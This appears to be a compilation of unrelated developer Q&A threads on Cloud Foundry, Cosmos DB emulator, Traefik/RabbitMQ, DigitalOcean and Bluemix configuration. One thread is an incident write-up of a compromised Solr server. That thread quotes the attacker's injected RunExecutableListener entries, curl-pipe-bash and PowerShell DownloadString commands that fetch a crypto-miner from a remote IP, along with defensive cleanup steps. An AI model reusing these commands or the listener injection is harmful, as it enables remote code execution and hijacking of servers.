I review the Cloud Foundry project and try to install it on a server
I will use Couchdb as a database service.
My principal question is : How use CouchDB in Cloud Foundry?
I install a CF instance with : vcap_dev_setup -c devbox_all.yml -D mydomain.com
The devbox.yml contains :
$ install :
- all.
In this install the couchdb_node and the couchdb_gateway is present by default.
But it seems to be bug in general.
When I delete a app and I have this error for example :
$ vmc delete notes2
Provisioned service [mongodb-d216a] detected, would you like to delete it? [yN]: y
Provisioned service [redis-8fcdc] detected, would you like to delete it? [yN]: y
Deleting application [notes2]: OK
Deleting service [mongodb-d216a]: Error 503: Unexpected response from service gateway
So I tried to install a CF instance with this config.
(A standard single-node with redis, couch and mongo)
conf.yml :
$ jobs:
install:
- nats_server
- router
- stager
- ccdb
- cloud_controller:
builtin_services:
- redis
- mongodb
- couchdb
- health_manager
- dea
- uaa
- uaadb
- redis_node:
index: "0"
- couchdb_node:
index: "0"
- mongodb_node:
index: "0"
- coudb_gateway
- redis_gateway
- mongodb_gateway
First, this config doesn't work, because the option 'couchdb' is not a valable keyword (In the part built-in services)
So, what I do wrong?
Is in the way to integrate couch and it's not finished last week ?
To continue, I success to install the CF instance without the couchdb built-in services option but with a couchdb_node, and a couchdb_gateway. And they start.
I suppose the service is runnable.
But i can't use 'couchdb' in my app manifest.yml or choose this service to bind on.
(It's seems normal because it's not install as a service)
So, It seems to be close to work, but it's not.
I resquest Ideas, Advice on this subject here because I didn't find people talking about around the web.
Thank's to read me.
Lucas
I decided to try this myself and it appears to work OK. I created a new VCAP instance with vcap_dev_setup and the following configuration ..
---
deployment:
name: "cloudfoundry"
jobs:
install:
- nats_server
- cloud_controller:
builtin_services:
- mysql
- postgresql
- couchdb
- stager
- router
- health_manager
- uaa
- uaadb
- ccdb
- dea
- couchdb_gateway
- couchdb_node:
index: "0"
- postgresql_gateway
- postgresql_node:
index: "0"
- mysql_gateway
- mysql_node:
index: "0"
I was able to bind instances of CouchDB to a node app and read the service info from VCAP_SERVICES, as below;
'{"couchdb-1.2":[{"name":"couchdb-c7eb","label":"couchdb-1.2","plan":"free","tags":["key-value","cache","couchdb-1.2","couchdb"],"credentials":{"hostname":"127.0.0.1","host":"127.0.0.1","port":5984,"username":"7f3c0567-89cc-4240-b249-40d1f4586035","password":"8fef9e88-3df2-46a8-a22c-db02b2917251","name":"dde98c69f-01e9-4e97-b0d6-43bed946da95"}}]}'
I was also able to tunnel the service to a local port and connect to it which you can see in this image
What version of Ubuntu have you used to install VCAP?
Related
I have been battling this for a while now.
Scenario
We are using Cosmos SQL API and Cosmos Graph (Gremlin) in our project. For a long time we have been forced to use Azure resources when developing for the graph databases.
I whish to get rid of this for the LDE and run Azure CosmosDB emulator in docker using mcr.microsoft.com/cosmosdb/windows/azure-cosmos-emulator:latest image. The reason for docker is that we have some weird policies forced upon us from the IT Corp which made it impossible to get Azure Cosmos DB Emulator to work properly even for the SQLAPI. SQL Api works fine with the docker image. And I'm running docker compose.
After some investigation I found that the image is actually not looking for the environment variables like AZURE_COSMOS_EMULATOR_GREMLIN_ENDPOINT:true to be set. This was after investigating C:/CosmosDB.Emulator/Start.ps1 in the container. So i figured that I could fix this by simply replacing the Start.ps1 in the container, stop it, and commit it as a new image.
Which worked! Then I created a script for replicating the manual steps so my team does not have to do the same procedure. And now its not working the SQLAPI and Azure Cosmos DB Explorer works perfect but I cannot connect with Gremlin over port 8901 which worked earlier, once at least.
I have confirmed that the Start-CosmosDbEmulator command executed during start of the container has the -EnableGremlin flag set. But no luck, I just getting:
Unable to connect to the remote server ---> System.Net.Http.HttpRequestException: A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond. ---> System.Net.Sockets.SocketException: A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond..
Is there anyone that has got this two work? I can't figure out what the issue is.
This is what I tried / have done:
Certificates are imported and the https://localhost:8081/_explorer/index.html is trusted.
The port setup in the docker-compose file is standard.
I have tried to start container with docker run no luck.
I 100% sure that the start-up command is rans with the -EnableGremlin set. Because of the transcript log file and investigating the Start.ps1 file in the container.
The computemachine.config in container has the "IsGremlinEndpointEnabled":true for the container administrator user.
I connect over localhost:8901 with the standard key and the database and container/collection is created.
Querying with SQLAPI works find.
Note: It worked fine the single time I got it to work also together with the Gremlin API functionality.
Docker Compose
version: '2.4' # Do not upgrade to 3.x yet, unless you plan to use swarm/docker stack: https://github.com/docker/compose/issues/4513
networks:
default:
external: false
ipam:
driver: default
config:
- subnet: "172.16.238.0/24"
services:
cosmosdb:
container_name: "azurecosmosemulator-sqlapi"
hostname: "azurecosmosemulator-sqlapi"
image: 'customimagename'
platform: windows
tty: true
restart: always
mem_limit: 3GB
ports:
- '8081:8081'
- '8900:8900'
- '8901:8901'
- '8902:8902'
- '10250:10250'
- '10251:10251'
- '10252:10252'
- '10253:10253'
- '10254:10254'
- '10255:10255'
- '10256:10256'
- '10350:10350'
environment:
- AZURE_COSMOS_EMULATOR_PARTITION_COUNT:10
- AZURE_COSMOS_EMULATOR_ENABLE_DATA_PERSISTENCE:true
- AZURE_COSMOS_EMULATOR_GREMLIN_ENDPOINT:true
networks:
default:
ipv4_address: 172.16.238.246
volumes:
- '${hostDirectoryCosmosDBSQLAPI}:C:\CosmosDB.Emulator\bind-mount'
I haven't removed the environment variables that does not seems to have any purpose at all. But I have tried to have them removed several times if that had any affect in code that I cannot or have not yet investigated inside the container.
The transcript log
**********************
Windows PowerShell transcript start
Start time: 20220204162955
Username: User Manager\ContainerAdministrator
RunAs User: User Manager\ContainerAdministrator
Machine: AZURECOSMOSEMUL (Microsoft Windows NT 10.0.14393.0)
Host Application: powershell.exe -NoExit -NoLogo -Command C:\CosmosDB.Emulator\Start.ps1
Process ID: 1868
PSVersion: 5.1.14393.4583
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.4583
BuildVersion: 10.0.14393.4583
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Transcript started, output file is C:\CosmosDB.Emulator\bind-mount\Diagnostics\Transcript.log
INFO: Stop-CosmosDbEmulator
INFO: Start-CosmosDbEmulator -AllowNetworkAccess -NoFirewall -NoUI -Key C2y6yDjf5/R+ob0N8A7Cgv30VRDJIWEHLM+4QDU5DE2nQ9nDuVTqobD4b8mGGyPMbIZnqyMsEcaGQy67XIw/Jw== -Consistency Session -Timeout 300 -EnableGremlin
Directory: C:\CosmosDB.Emulator\bind-mount
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/4/2022 4:30 PM 804 CosmosDbEmulatorCert.cer
Key : GremlinEndpoint
Value : {http://azurecosmosemulator-sqlapi:8901/, http://172.16.238.246:8901/}
Name : GremlinEndpoint
Key : TableEndpoint
Value : {https://azurecosmosemulator-sqlapi:8902/, https://172.16.238.246:8902/}
Name : TableEndpoint
Key : Key
Value : C2y6yDjf5/R+ob0N8A7Cgv30VRDJIWEHLM+4QDU5DE2nQ9nDuVTqobD4b8mGGyPMbIZnqyMsEcaGQy67XIw/Jw==
Name : Key
Key : Version
Value : 2.14.5.0
Name : Version
Key : IPAddress
Value : 172.16.238.246
Name : IPAddress
Key : Emulator
Value : CosmosDB.Emulator
Name : Emulator
Key : CassandraEndpoint
Value : {tcp://azurecosmosemulator-sqlapi:10350/, tcp://172.16.238.246:10350/}
Name : CassandraEndpoint
Key : MongoDBEndpoint
Value : {mongodb://azurecosmosemulator-sqlapi:10255/, mongodb://172.16.238.246:10255/}
Name : MongoDBEndpoint
Key : Endpoint
Value : {https://azurecosmosemulator-sqlapi:8081/, https://172.16.238.246:8081/}
Name : Endpoint
I hope there is someone out their that can point me in the right direction here.
Maybe the solution is to skip this entirely and live with the fact that I have to create collections in Azure and work against does for the graph databases.
Greatful for any advice.
I'm currently working on a project where I have a virtual machine on Microsoft Azure and I'm trying to have multiple Docker containers to be accessed through different routes with the help of a Traefik reverse proxy. Besides the reverse-proxy, the first service I need to have is RabbitMQ and I should be able to access its user-interface on a /rmq route. Right now, I have the following docker-compose file to build both services:
version: "3.5"
services:
rabbitmq:
image: rabbitmq:3-alpine
expose:
- 5672
- 15672
volumes:
- ./rabbit/enabled_plugins:/etc/rabbitmq/enabled_plugins
labels:
- traefik.enable=true
- traefik.http.routers.rabbitmq.rule=Host(`HOST.com`) && PathPrefix(`/rmq`)
# needed, when you do not have a route "/rmq" inside your container (according to https://stackoverflow.com/questions/59054551/how-to-map-specific-port-inside-docker-container-when-using-traefik)
- traefik.http.routers.rabbitmq.middlewares=strip-docs
- traefik.http.middlewares.strip-docs.stripprefix.prefixes=/rmq
- traefik.port=15672
networks:
- proxynet
traefik:
image: traefik:2.1
command: --api=true # Enables the web UI
volumes:
- /var/run/docker.sock:/var/run/docker.sock:ro
- ./traefik/traefik.toml:/etc/traefik/traefik.toml:ro
ports:
- 80:80
- 443:443
labels:
traefik.enable: true
traefik.http.routers.traefik.rule: "Host(`HOST.com`)"
traefik.http.routers.traefik.service: "api#internal"
networks:
- proxynet
And this is the content of my traefik.toml file:
logLevel = "DEBUG"
debug = true
[api]
dashboard = true
insecure = false
debug = true
[providers.docker]
endpoint = "unix:///var/run/docker.sock"
watch = true
[entryPoints]
[entryPoints.web]
address = ":80"
[entryPoints.web-secure]
address = ":443"
[log]
level = "DEBUG"
format = "json"
The enabled_plugins file specifies which RabbitMQ plugins should be activated. Here, I have the rabbitmq_management plugin (among others), which I think is needed to access the RabbitMQ UI. I even checked the logs of the RabbitMQ container and apparently the rabbitmq_management was properly started:
rabbitmq_1 | 2021-01-30 15:50:30.538 [info] <0.730.0> Server startup complete; 7 plugins started.
rabbitmq_1 | * rabbitmq_stomp
rabbitmq_1 | * rabbitmq_federation_management
rabbitmq_1 | * rabbitmq_mqtt
rabbitmq_1 | * rabbitmq_federation
rabbitmq_1 | * rabbitmq_management
rabbitmq_1 | * rabbitmq_web_dispatch
rabbitmq_1 | * rabbitmq_management_agent
rabbitmq_1 | completed with 7 plugins.
rabbitmq_1 | 2021-01-30 15:50:30.539 [info] <0.730.0> Resetting node maintenance status
With these configurations running with docker-compose up, if I try to access HOST.com/rmq, I get a 502 (Bad Gateway) error on the console of my browser. And initially, this was where I was stuck. However, after searching for some help online, I found a different way to specify the traefik port on the RabbitMQ container labels (traefik.http.services.rabbitmq.loadbalancer.server.port=15672) and, with this modification, I don't have the Bad Request error anymore, but I get a lot of ERR_ABORTED 404 (Not Found) errors on the console of my browser (the list bellow does not contain all the errors):
rmq:7 GET http://HOST.com/js/ejs-1.0.min.js net::ERR_ABORTED 404 (Not Found)
rmq:18 GET http://HOST.com/js/charts.js net::ERR_ABORTED 404 (Not Found)
rmq:19 GET http://HOST.com/js/singular/singular.js net::ERR_ABORTED 404 (Not Found)
Refused to apply style from 'http://HOST.com/css/main.css' because its MIME type ('text/plain') is not a supported stylesheet MIME type, and strict MIME checking is enabled.
rmq:27 Uncaught ReferenceError: sync_get is not defined at rmq:27
I don't have much experience with this kind of projects and I don't know if I'm doing something wrong or if there's something missing in these configurations or on the configurations of the virtual machine itself. Do you know what I should do to be able to access the RabbitMQ UI with the URL HOST.com/rmq ?
If I get this running properly, I think I would also be able to configure Docker to only allow access to the Traefik UI with a route such as HOST.com/dashboard, instead of accessing it only with the URL without any routes.
Thanks in advance!
Solved it. I don't know why, but when I used the configuration traefik.http.services.rabbitmq.loadbalancer.server.port=15672, I changed the order of the lines traefik.http.routers.rabbitmq.middlewares=strip-docs and traefik.http.middlewares.strip-docs.stripprefix.prefixes=/rmq, making the prefix appear before the middleware. Changed that and now I can access the RabbitMQ UI on HOST.com/rmq. So my final docker-compose was this:
version: "3.5"
services:
rabbitmq:
image: rabbitmq:3-alpine
expose:
- 5672
- 15672
volumes:
- ./rabbit/enabled_plugins:/etc/rabbitmq/enabled_plugins
labels:
- traefik.enable=true
- traefik.http.routers.rabbitmq.rule=Host(`HOST.com`) && PathPrefix(`/rmq`)
# needed, when you do not have a route "/rmq" inside your container (according to https://stackoverflow.com/questions/59054551/how-to-map-specific-port-inside-docker-container-when-using-traefik)
- traefik.http.routers.rabbitmq.middlewares=strip-docs
- traefik.http.middlewares.strip-docs.stripprefix.prefixes=/rmq
- traefik.http.services.rabbitmq.loadbalancer.server.port=15672
networks:
- proxynet
traefik:
image: traefik:2.1
command: --api=true # Enables the web UI
volumes:
- /var/run/docker.sock:/var/run/docker.sock:ro
- ./traefik/traefik.toml:/etc/traefik/traefik.toml:ro
ports:
- 80:80
- 443:443
labels:
traefik.enable: true
traefik.http.routers.traefik.rule: "Host(`HOST.com`)"
traefik.http.routers.traefik.service: "api#internal"
networks:
- proxynet
I'll mark this question as solved, but if you know why the order of these 2 lines matters, please explain for future reference.
Thanks!
Trace of how I determined an answer to suggest for this question, given that I haven't used the specific tools:
By searching rabbitmq admin url, I found the rabbitmq management docs page, which near the top, mentions support of a path prefix setting. I searched the page for that, and under the relevant heading, found that you likely will need to set this setting in your rabbitmq config:
management.path_prefix = /rmq
So, to apply it to your docker config, I looked up the rabbitmq docker image, which discusses that configuration files need to be injected via a bind mount, or can be provided via an esoteric erlang config thing which I'd personally not mess with. Therefore, the steps I'd follow from here would be:
look in the existing rabbitmq image to find out what the default config file in /etc/rabbitmq/rabbitmq.conf is, eg by running docker-compose run rabbitmq cat /etc/rabbitmq/rabbitmq.conf, or an appropriate docker cp command if it turns out rabbitmq sets a docker ENTRYPOINT which prevents use of shell commands on the image command line
add a volume just like you have with enabled plugins but move it one directory upward, mapping rabbit/ to /etc/rabbitmq/, and then put the default config from the container in rabbit/
add that line to the config file
With any luck that should at least get you closer. I'm curious to hear how it goes!
By the way, while looking at the rabbitmq docker image docs, I discovered that there are special tags for if you need management interface support. You may find that you need to switch to one of those instead of plain 3-alpine in order for this to work, eg rabbitmq:3-management-alpine.
I've created a YAML spec for my DO App Platform based on the sample on this repository.
The reason I couldn't simply use the UI on the DigitalOcean website is that my project is a monorepo.
Which looks like this:
name: unique-expressions
services:
- name: api
environment_slug: node-js
github:
repo: Valencian-Digital/unique-expressions
branch: main
deploy_on_push: true
source_dir: api
routes:
- path: /api
But when I try to execute
doctl apps create --spec .do/app.yaml
It returns a 500 Error and nothing else. I've tried executing the command both in a Github action and locally with different API tokens.
I'm able to access other resources on my DO account but I can't successfully create the spec.
This is the specific error I get back from doctl:
Error: POST https://api.digitalocean.com/v2/apps: 500 Server Error
Do y'all what could be going wrong?
So I discovered what was going wrong. Essentially the branch name was wrong (I put main instead of master).
You can find more info here: https://github.com/digitalocean/doctl/issues/883.
TLDR - this is the right config:
name: unique-expressions
services:
- name: api
environment_slug: node-js
github:
repo: Valencian-Digital/unique-expressions
branch: master
deploy_on_push: true
source_dir: api
routes:
- path: /api
Prehistory:
My friend's site started to work slowly.
This site uses docker.
htop told me that all cores loaded on 100% by the process /var/tmp/sustes with the user 8983. Tried to find out what is sustes, but Google did not help, but 8983 tells that the problem in Solr container.
Tried to update Solr from v6.? to 7.4 and got the message:
o.a.s.c.SolrCore Error while closing
...
Caused by: org.apache.solr.common.SolrException: Error loading class
'solr.RunExecutableListener'
Rolled back to v6.6.4 (as the only available v6 on docker-hub https://hub.docker.com/_/solr/) as site should continue working.
In Dockers logs I found:
[x:default] o.a.s.c.S.SolrConfigHandler Executed config commands successfully and persited to File System [{"update-listener":{
"exe":"sh",
"name":"newlistener-02",
"args":[
-"c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"}}]
So at http://192.99.142.226:8220/mr.sh we can find the malware code which installs crypto miner (crypto miner config: http://192.99.142.226:8220/wt.conf).
Using the link http://example.com:8983/solr/YOUR_CORE_NAME/config we can find full config, but right now we need just listener section:
"listener":[{
"event":"newSearcher",
"class":"solr.QuerySenderListener",
"queries":[]},
{
"event":"firstSearcher",
"class":"solr.QuerySenderListener",
"queries":[]},
{
"exe":"sh",
"name":"newlistener-02",
"args":["-c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"},
{
"exe":"sh",
"name":"newlistener-25",
"args":["-c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"},
{
"exe":"cmd.exe",
"name":"newlistener-00",
"args":["/c",
"powershell IEX (New-Object Net.WebClient).DownloadString('http://192.99.142.248:8220/1.ps1')"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"cmd.exe"}],
As we do not have such settings at solrconfig.xml, I found them at /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json (the settings of this file can be found at http://example.com:8983/solr/YOUR_CORE_NAME/config/overlay
Fixing:
Clean configoverlay.json, or simply remove this file (rm /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json).
Restart Solr (how to Start\Stop - https://lucene.apache.org/solr/guide/6_6/running-solr.html#RunningSolr-StarttheServer) or restart docker container.
As I understand, this attack is possible due to CVE-2017-12629:
How to Attack Apache Solr By Using CVE-2017-12629 - https://spz.io/2018/01/26/attack-apache-solr-using-cve-2017-12629/
CVE-2017-12629: Remove RunExecutableListener from Solr - https://issues.apache.org/jira/browse/SOLR-11482?attachmentOrder=asc
... and is being fixed in v5.5.5, 6.6.2+, 7.1+
which is due to freely available http://example.com:8983 for anyone, so despite this exploit is fixed, lets...
Add protection to http://example.com:8983
Based on https://lucene.apache.org/solr/guide/6_6/basic-authentication-plugin.html#basic-authentication-plugin
Create security.json with:
{
"authentication":{
"blockUnknown": true,
"class":"solr.BasicAuthPlugin",
"credentials":{"solr":"IV0EHq1OnNrj6gvRCwvFwTrZ1+z1oBbnQdiVC3otuq0=
Ndd7LKvVBAaZIF0QAVi1ekCfAJXr1GGfLtRUXhgrF8c="}
},
"authorization":{
"class":"solr.RuleBasedAuthorizationPlugin",
"permissions":[{"name":"security-edit",
"role":"admin"}],
"user-role":{"solr":"admin"}
}}
This file must be dropped at /opt/solr/server/solr/ (ie next to solr.xml)
As Solr has its own Hash-checker (as a sha256(password+salt) hash), a typical solution can not be used here. The easiest way to generate hash that Ive found is to download jar file from here http://www.planetcobalt.net/sdb/solr_password_hash.shtml (at the end of the article) and run it as java -jar SolrPasswordHash.jar NewPassword.
Because I use docker-compose, I simply build Solr like this:
# project/dockerfiles/solr/Dockerfile
FROM solr:7.4
ADD security.json /opt/solr/server/solr/
# project/sources/docker-compose.yml (just Solr part)
solr:
build: ./dockerfiles/solr/
container_name: solr-container
# Check if 'default' core is created. If not, then create it.
entrypoint:
- docker-entrypoint.sh
- solr-precreate
- default
# Access to web interface from host to container, i.e 127.0.0.1:8983
ports:
- "8983:8983"
volumes:
- ./dockerfiles/solr/default:/opt/solr/server/solr/mycores/default # configs
- ../data/solr/default/data:/opt/solr/server/solr/mycores/default/data # indexes
I'm trying to follow the tutorial noted below:
http://www.ibm.com/developerworks/cloud/library/cl-bluemix-nodejs-app/
But when I push my app, I see the following:
Using manifest file /mytests/bluemix-node-mysql-upload/manifest.yml
Updating app jea-node-mysql-upload in org jea68#gmail.com / space dev as jea68#gmail.com...
OK
Uploading jea-node-mysql-upload...
Uploading app files from: /mytests/bluemix-node-mysql-upload/app
Uploading 53.6K, 11 files
Done uploading
OK
FAILED
Could not find service mysql-database to bind to jea-node-mysql-upload
Is there a problem with the node.js buildpack or is the documentation faulty?
I've been able to push apps to Node.js without any problems this morning. The documentation assumes the user knows that the service has already been created. The manifest.yml included in the github repo of the tutorial defines a service (mysql-database) that has not been created. Run the following command to create the service:
$ cf create-service mysql 100 jea-mysql-node-upload-service
Then modify the manifest.yml to include:
services:
- jea-mysql-node-upload-service
Alternatively, since you already have an app, you can bind the application to the service by running the following:
$ cf bind-service jea-node-mysql-upload jea-mysql-node-upload-service
$ cf start jea-node-mysql-upload
It looks like a fault in the documentation. If you look at Step 2 part 3 it says to create the my-sql service using this command:
cf create-service mysql 100 mysql-node-upload
which will name the service instance as mysql-node-upload, however the manifest.yml file that you cloned from github contains the service name of just mysql-service. It is the manifest.yml file that links the app with the service instance.
The options are either the change the manifest.yml file to be the correct name of your mysql service instance or recreate the mysql service instance with the name that is in your manifest.yml.